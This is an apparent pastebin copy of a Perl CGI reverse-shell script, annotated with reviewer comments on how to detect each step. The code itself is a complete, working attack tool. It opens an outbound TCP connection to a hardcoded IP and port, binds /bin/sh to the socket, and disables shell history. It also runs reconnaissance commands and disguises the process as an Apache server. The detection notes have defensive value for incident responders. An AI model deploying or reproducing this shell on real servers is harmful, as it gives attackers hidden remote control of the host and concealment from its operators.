
Untitled

a guest
Jun 19th, 2019
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
#
# Reviewer summary (defensive reading): run as a CGI script, this program
# opens an outbound TCP connection to a fixed address, attaches /bin/sh to
# that socket and returns a short HTML status page to the requesting browser.
# A copy found under a web root that is not part of an authorised test should
# be handled as an incident. Behaviours that leave observable traces are
# marked "Detection:" below.
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell. Change these.
# Detection: these two values are the only network destination in the script.
# In a recovered copy they are the address and port to search for in
# firewall, proxy and flow logs.
my $ip = '128.1.36.27';
my $port = 1234;

# Options
my $daemon = 1; # non-zero: fork and detach before connecting (see below)
my $auth = 0; # 0 means authentication is disabled and any
# source IP can access the reverse shell
# The "authentication" is only a regex match on REMOTE_ADDR. Whoever makes the
# request, the connection below always goes to $ip:$port.
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";                         # HTML buffer filled by cgiprint()
my $fake_process_name = "/usr/sbin/apache";   # passed as argv[0] to /bin/sh at the end

# Change the process name to be less conspicuous
# Detection: the name shown in process listings becomes "[httpd]" while the
# running program is still the perl interpreter; a mismatch between the
# displayed name and the real executable is the thing to look for.
$0 = "[httpd]";

# Authenticate based on source IP address if required
# REMOTE_ADDR is only defined when the web server has set it, so this branch
# is skipped when the script is run outside a CGI context.
if (defined($ENV{'REMOTE_ADDR'})) {
    cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

    if ($auth) {
        unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
            cgiprint("ERROR: Your client isn't authorised to view this page");
            cgiexit();
        }
    }
} elsif ($auth) {
    cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");
    cgiexit(0); # cgiexit() takes no parameters; the 0 is ignored
}

# Background and dissociate from parent process if required
# The parent returns the status page collected so far and exits, so the HTTP
# request completes while the child carries on.
# NOTE(review): the return value of fork() is only tested for truth, so a
# failed fork (undef) continues down the child path.
# Detection: a process started by the web server that has moved into its own
# session and has "/" as its working directory.
if ($daemon) {
    my $pid = fork();
    if ($pid) {
        cgiexit(0); # parent exits
    }

    setsid();
    chdir('/');
    umask(0);
}

# Make TCP connection for reverse shell
# NOTE(review): the result of socket() is not checked; only connect() is.
# Detection: an outbound TCP connection initiated by a process descended from
# the web server, which normally only accepts inbound connections.
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
    cgiprint("Sent reverse shell to $ip:$port");
    cgiprintpage();
} else {
    cgiprint("Couldn't open reverse shell to $ip:$port: $!");
    cgiexit();
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
# All three standard handles are re-opened as duplicates of SOCK, using the
# same ">&" mode for each, so everything started after this point reads from
# and writes to the remote end.
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
# Detection: HISTFILE=/dev/null in the environment of a shell process, which
# stops the shell from keeping a history file.
$ENV{'HISTFILE'} = '/dev/null';
# Detection: a short-lived shell running "w", "uname -a", "id" and "pwd" in
# one go under the web server account.
system("w;uname -a;id;pwd");
# The indirect-object form of exec runs /bin/sh but hands it
# $fake_process_name as argv[0].
# Detection: a process whose command line reads "/usr/sbin/apache -i" while
# its executable is /bin/sh, with all three standard descriptors on a socket.
exec({"/bin/sh"} ($fake_process_name, "-i"));

  71. # Wrapper around print
  72. sub cgiprint {
  73. my $line = shift;
  74. $line .= "<p>\n";
  75. $global_page .= $line;
  76. }
  77.  
  78. # Wrapper around exit
  79. sub cgiexit {
  80. cgiprintpage();
  81. exit 0; # 0 to ensure we don't give a 500 response.
  82. }
  83.  
# Form HTTP response using all the messages gathered by cgiprint so far
#
# Prints three CGI response headers followed by the buffered page to STDOUT.
# Content-Length is taken from length($global_page). The header block is one
# double-quoted string that spans three source lines: the first two headers
# end in "\r" plus the literal line break in the source, the last in
# "\r\n\r\n". The "\/" in the content type is simply "/".
# NOTE(review): any leading whitespace on the continuation lines would become
# part of the header text; the paste shows none, so they are kept flush left.
sub cgiprintpage {
    print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}